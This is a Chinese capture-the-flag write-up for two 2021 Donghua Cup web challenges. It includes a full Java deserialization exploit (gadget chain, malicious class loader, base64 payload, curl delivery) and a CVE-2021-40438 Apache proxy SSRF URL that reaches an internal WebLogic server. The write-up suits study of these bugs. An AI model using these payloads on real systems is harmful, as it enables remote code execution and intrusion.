2021东华杯
青 叶

Web

EzGadget

这是一个反序列化的题目,先把关键代码放出来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.ezgame.ctf.controller;

import com.ezgame.ctf.tools.Tools;
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.io.ObjectInputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;

@Controller
public class IndexController {
public IndexController() {
}

@ResponseBody
@RequestMapping({"/"})
public String index(HttpServletRequest request, HttpServletResponse response) {
return "index";
}

@ResponseBody
@RequestMapping({"/readobject"})
public String unser(@RequestParam(name = "data",required = true) String data, Model model) throws Exception {
byte[] b = Tools.base64Decode(data);
InputStream inputStream = new ByteArrayInputStream(b);
ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
String name = objectInputStream.readUTF();
int year = objectInputStream.readInt();
if (name.equals("gadgets") && year == 2021) {
objectInputStream.readObject();
}

return "welcome bro.";
}
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.ezgame.ctf.tools;

import java.io.Serializable;

public class ToStringBean extends ClassLoader implements Serializable {
private byte[] ClassByte;

public ToStringBean() {
}

public String toString() {
ToStringBean toStringBean = new ToStringBean();
Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
Object var3 = null;

try {
var3 = clazz.newInstance();
} catch (InstantiationException var5) {
var5.printStackTrace();
} catch (IllegalAccessException var6) {
var6.printStackTrace();
}

return "enjoy it.";
}
}

反序列化利用点

整体的一个分析并不是很难,注意到在路由**/readobject**下,读取了data字段,而data字段是一个经过Base64编码的Java序列化串。前面的readUTF和readInt都很容易可以绕过。关键在于objectInputStream.readObject();

如何利用这个执行恶意任意命令才是重点。

注意到ToStringBean中有defineClass函数的调用,说明在这里可以引入恶意的类字节码。

但是现在最为关键的是,我们需要调用ToStringBean.toString()方法,只有调用了该方法,我们才能载入恶意字节码,并且执行我们的恶意代码。

BadAttributeValueExpException(CC5)

参考CC5链的利用,类BadAttributeValueExpException的定义为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
package javax.management;

import java.io.IOException;
import java.io.ObjectInputStream;

public class BadAttributeValueExpException extends Exception {


/* Serial version */
private static final long serialVersionUID = -3105272988410493376L;

/**
* @serial A string representation of the attribute that originated this exception.
* for example, the string value can be the return of {@code attribute.toString()}
*/
@SuppressWarnings("serial") // See handling in constructor and readObject
private Object val;

/**
* Constructs a BadAttributeValueExpException using the specified Object to
* create the toString() value.
*
* @param val the inappropriate value.
*/
public BadAttributeValueExpException (Object val) {
this.val = val == null ? null : val.toString();
}


/**
* Returns the string representing the object.
*/
public String toString() {
return "BadAttributeValueException: " + val;
}

private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
ObjectInputStream.GetField gf = ois.readFields();
Object valObj = gf.get("val", null);

if (valObj == null) {
val = null;
} else if (valObj instanceof String) {
val= valObj;
} else if (System.getSecurityManager() == null
|| valObj instanceof Long
|| valObj instanceof Integer
|| valObj instanceof Float
|| valObj instanceof Double
|| valObj instanceof Byte
|| valObj instanceof Short
|| valObj instanceof Boolean) {
val = valObj.toString();
} else { // the serialized object is from a version without JDK-8019292 fix
val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
}
}
}

在其readObject方法中可以清晰地看到,存在:

1
val = valObj.toString();

而val在上述的定义中可以发现是一个私有的Object类型变量。

这样子思路就明晰了,构造一个ToStringBean对象,其classByte为我们的恶意字节码,然后将这个对象赋为BadAttributeValueExpException的val,从而使得其调用val的toString方法

构造Payload

由于是本地复现的,环境搭建在Windows上面,所以恶意执行命令设成了notepad.exe,做题时换命令即可。

先放执行恶意命令的类(由于会执行newInstance,故将代码放到构造函数里即可):

1
2
3
4
5
6
public class Eval {
public Eval() throws Exception{
Object runtime = Class.forName("java.lang.Runtime").getMethod("getRuntime", new Class[]{}).invoke(null);
Class.forName("java.lang.Runtime").getMethod("exec",String.class).invoke(runtime,"notepad.exe");
}
}

再给出生成Payload的类:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import com.ezgame.ctf.tools.ToStringBean;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;

public class Main {

public static String base64Encode(byte[] bytes) {
Base64.Encoder encoder = Base64.getEncoder();
return encoder.encodeToString(bytes);
}

public static void main(String[] args) throws Exception {
ByteArrayOutputStream bout = new ByteArrayOutputStream();
ObjectOutputStream objOut = new ObjectOutputStream(bout);
objOut.writeUTF("gadgets");
objOut.writeInt(2021);

FileInputStream fs = new FileInputStream("E:\\Src\\Java\\java_un\\out\\production\\java_un\\com\\ezgame\\ctf\\tools\\Eval.class");
Class clazz = Class.forName("com.ezgame.ctf.tools.ToStringBean");
Field field = clazz.getDeclaredField("ClassByte");
field.setAccessible(true);
ToStringBean bean = new ToStringBean();
field.set(bean, fs.readAllBytes());
fs.close();
BadAttributeValueExpException bd = new BadAttributeValueExpException(null);
clazz = Class.forName("javax.management.BadAttributeValueExpException");
field = clazz.getDeclaredField("val");
field.setAccessible(true);
field.set(bd, bean);
objOut.writeObject(bd);

objOut.writeObject(null);
System.out.println(Main.base64Encode(bout.toByteArray()));
}
}

发送后可以看到弹窗了Win10,说明攻击成功。

1
$ curl -Method Post -Uri http://localhost:8888/readobject -Body @{"data"="rO0ABXcNAAdnYWRnZXRzAAAH5XNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAAXNyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIACEIABmZvcm1hdEkACmxpbmVOdW1iZXJMAA9jbGFzc0xvYWRlck5hbWVxAH4ABUwADmRlY2xhcmluZ0NsYXNzcQB+AAVMAAhmaWxlTmFtZXEAfgAFTAAKbWV0aG9kTmFtZXEAfgAFTAAKbW9kdWxlTmFtZXEAfgAFTAANbW9kdWxlVmVyc2lvbnEAfgAFeHABAAAAMnQAA2FwcHQAE2NvbS5lemdhbWUuY3RmLk1haW50AAlNYWluLmphdmF0AARtYWlucHBzcgAfamF2YS51dGlsLkNvbGxlY3Rpb25zJEVtcHR5TGlzdHq4F7Q8p57eAgAAeHB4c3IAIWNvbS5lemdhbWUuY3RmLnRvb2xzLlRvU3RyaW5nQmVhbhPMVFon2dx5AgABWwAJQ2xhc3NCeXRldAACW0J4cHVyAAJbQqzzF/gGCFTgAgAAeHAAAAMjyv66vgAAADoALwoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClWCAAIAQARamF2YS5sYW5nLlJ1bnRpbWUKAAoACwcADAwADQAOAQAPamF2YS9sYW5nL0NsYXNzAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsIABABAApnZXRSdW50aW1lCgAKABIMABMAFAEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsKABYAFwcAGAwAGQAaAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7CAAcAQAEZXhlYwcAHgEAEGphdmEvbGFuZy9TdHJpbmcIACABAAtub3RlcGFkLmV4ZQcAIgEAGWNvbS9lemdhbWUvY3RmL3Rvb2xzL0V2YWwBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAG0xjb20vZXpnYW1lL2N0Zi90b29scy9FdmFsOwEAB3J1bnRpbWUBABJMamF2YS9sYW5nL09iamVjdDsBAApFeGNlcHRpb25zBwAsAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAClNvdXJjZUZpbGUBAAlFdmFsLmphdmEAIQAhAAIAAAAAAAEAAQAFAAYAAgAjAAAAfQAGAAIAAAA9KrcAARIHuAAJEg8DvQAKtgARAQO9AAK2ABVMEge4AAkSGwS9AApZAxIdU7YAESsEvQACWQMSH1O2ABVXsQAAAAIAJAAAABIABAAAAAQABAAFABsABwA8AAgAJQAAABYAAgAAAD0AJgAnAAAAGwAiACgAKQABACoAAAAEAAEAKwABAC0AAAACAC5w"}

Apache Proxy

忘记题目叫什么了,就叫这个好了。

队友搜出了是什么洞,确实是打通了(但没有完全打通,刚拿到Welogic版本就没了,全部400,后来就放了)。

漏洞CVE-2021-40438。

直接上Payload:

1
http://47.104.181.226:7410/?unix:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |http://172.24.0.2:7001/

这样子就可以访问到内网的weblogic了,只是我刚拿到版本号,后面就死活都打不通了,三个给的网址都是400.

读到的版本号为:WebLogic Server 版本:12.2.1.3.0

CVE-2020-14882影响范围之内的WebLogic,因此可以直接利用。

看了看师傅的们的做法,还有一键直接打的(railgun),又发现了一个好工具,收藏了。